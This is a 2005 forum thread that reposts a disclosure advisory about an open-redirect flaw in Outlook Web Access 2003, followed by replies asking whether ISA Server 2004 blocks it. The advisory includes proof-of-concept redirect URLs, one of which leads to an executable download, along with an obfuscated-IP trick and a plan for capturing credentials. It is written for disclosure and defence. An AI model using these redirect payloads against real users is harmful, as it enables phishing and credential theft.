• RSS
  • Twitter
  • FaceBook

Welcome to ISAserver.org

Forums | Register | Login | My Profile | Inbox | RSS RSS icon | My Subscription | My Forums | Address Book | Member List | Search | FAQ | Ticket List | Log Out

OWA EXPLOIT

Users viewing this topic: none

Logged in as: Guest
  Printable Version
All Forums >> [ISA Server 2004 General ] >> General >> OWA EXPLOIT Page: [1]
Login
Message << Older Topic   Newer Topic >>
OWA EXPLOIT - 17.Feb.2005 7:30:00 PM   
spilmanr

 

Posts: 7
Joined: 18.Jan.2005
Status: offline
Ok this is what I came accross and wanted to share with everyone and ask a question.

OVERVIEW
========
A vulnerability in Microsoft Outlook Web Access allows malicious
attackers to redirect the login to any URL they wish.
This allows the attacker to force the user to the site of the
attackers choosing enabling the attacker to use social engenering
and phishing style of attacks.


AFFECTED PRODUCTS
=================
Microsoft Outlook Web Access ( OWA )
Windows 2003


DETAILS
=======
By using specialy crafted URL an attacker can cause the user
to be redirected to an arbitrary URL.


ATTACK PROFILE
==============
An attacker could gather known user email address for a company
that uses OWA. By appending an obfuscated redirected url with a
encoded url such as

https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://3221234342/

this will take the user to http://example.com when the login box
is pressed.

The attacker can then have a page to capture the user / password
and redirect back to the original login page or some other form of
phishing attack.


SOLUTION
========
Microsoft was contacted on Jan 20, 2005
NO patch has been produced to correct the vulnerability.
They have issued the following: on Jan 21, 2005
( see VENDOR RESPONSE )

This release is dated Jan 25, 2005



PROOF OF CONCEPT
================

1. https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://[otherhost]

2. https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://[otherhost/file.exe]

click "login"


after injection into the form, the source reveals...

<BODY scroll="AUTO" bgColor="#3D5FA3" text="#000000" leftMargin=0
topMargin=0>
<FORM action="/exchweb/bin/auth/owaauth.dll" method="POST"
name="logonForm"
autocomplete="off">
<INPUT type="hidden" name="destination"
value="http://[otherhost/file.exe]">
<INPUT type="hidden" name="flags" value="0">
<TABLE id="borderTable" class="standardTable" cellSpacing=0
cellPadding=0
height="100%" width="100%" bgColor="#3D5FA3" border=0>

note:
the [otherhost] may easily be obfuscated so as to not alarm the targeted
user(s) such as
https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://3221234342/
(
http://example.com )


notes:
example 1 redirects the user to a url of the attackers choosing.
example 2 prompts the user to download an executable or other file.
this could be used in conjunction with the aforementioned attack scenario.


CREDITS
=======
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs.com

Donnie Werner
se_cur_ity@hotmail.com
morning_wood@zone-h.org
--
Web: http://exploitlabs.com
http://zone-h.org



VENDOR RESPONSE
===============

researcher inital:
------------------
Dear Microsoft,
The following discusses a potential security vulnerability affecting
one of your products. We are bringing it to your attention in order to
assist you in investigating it and determining the appropriate actions,
and have provided preliminary information about the potential
vulnerability below. Please read our disclosure policy, available at
http://www.exploitlabs.com/disclosure-policy.html if you have any
questions.
Please confirm using the contact information I have provided below that
you have received this note.

We look forward to working with you,

Exploitlabs Research Team

Donnie Werner
se_cur_ity@hotmail.com


vendor response 1
-----------------
Hello Donnie,

Thanks very much for contacting us. We have investigated reports of this
behavior in the past and plan to fix it in the next major release of
Exchange. Please let me know if you have further questions.

Thanks,
Christopher, CISSP


researcher initial 2
--------------------
Christopher,
when is the "next major release of Exchange" due?
I think it may be in the interest of admins to know this
flaw exists, and to possibly alert thier users of potential
phishing attacks and to help secure their systems.
Exchange 2003 OWA is used extensivly in corporate
environments, where this flaw will have the most impact
being this is a moderate remote threat, this researcher
feels that PUBLIC FULL DISCLOSURE is needed.
possibly MS would be willing to issue a statement to
the public regarding this issue at this time.

regards,

Donnie Werner ( no fancy letters )

vendor response 2
-----------------
(none)

Now the question is does anyone think that using ISA 2004 as the OWA will stop this from occuing?
Post #: 1
RE: OWA EXPLOIT - 17.Feb.2005 7:41:00 PM   
tshinder

 

Posts: 50013
Joined: 10.Jan.2001
From: Texas
Status: offline
Hi Bobster,

Its a no brainer to stop using the ISA firewall's HTTP Security Filter.

Another reason to use ISA firewalls!

Thanks!
Tom

(in reply to spilmanr)
Post #: 2
RE: OWA EXPLOIT - 17.Feb.2005 9:22:00 PM   
spilmanr

 

Posts: 7
Joined: 18.Jan.2005
Status: offline
Tom,

Not sure what you are referring to. In our setup we only use the ISA to create a SSL bridge between the client and the ISA box and the another SSL bridge between the ISA and the back end. Would that have any affect on us what so ever?

(in reply to spilmanr)
Post #: 3

Page:   [1] << Older Topic    Newer Topic >>
All Forums >> [ISA Server 2004 General ] >> General >> OWA EXPLOIT Page: [1]
Jump to:

New Messages No New Messages
Hot Topic w/ New Messages Hot Topic w/o New Messages
Locked w/ New Messages Locked w/o New Messages
 Post New Thread
 Reply to Message
 Post New Poll
 Submit Vote
 Delete My Own Post
 Delete My Own Thread
 Rate Posts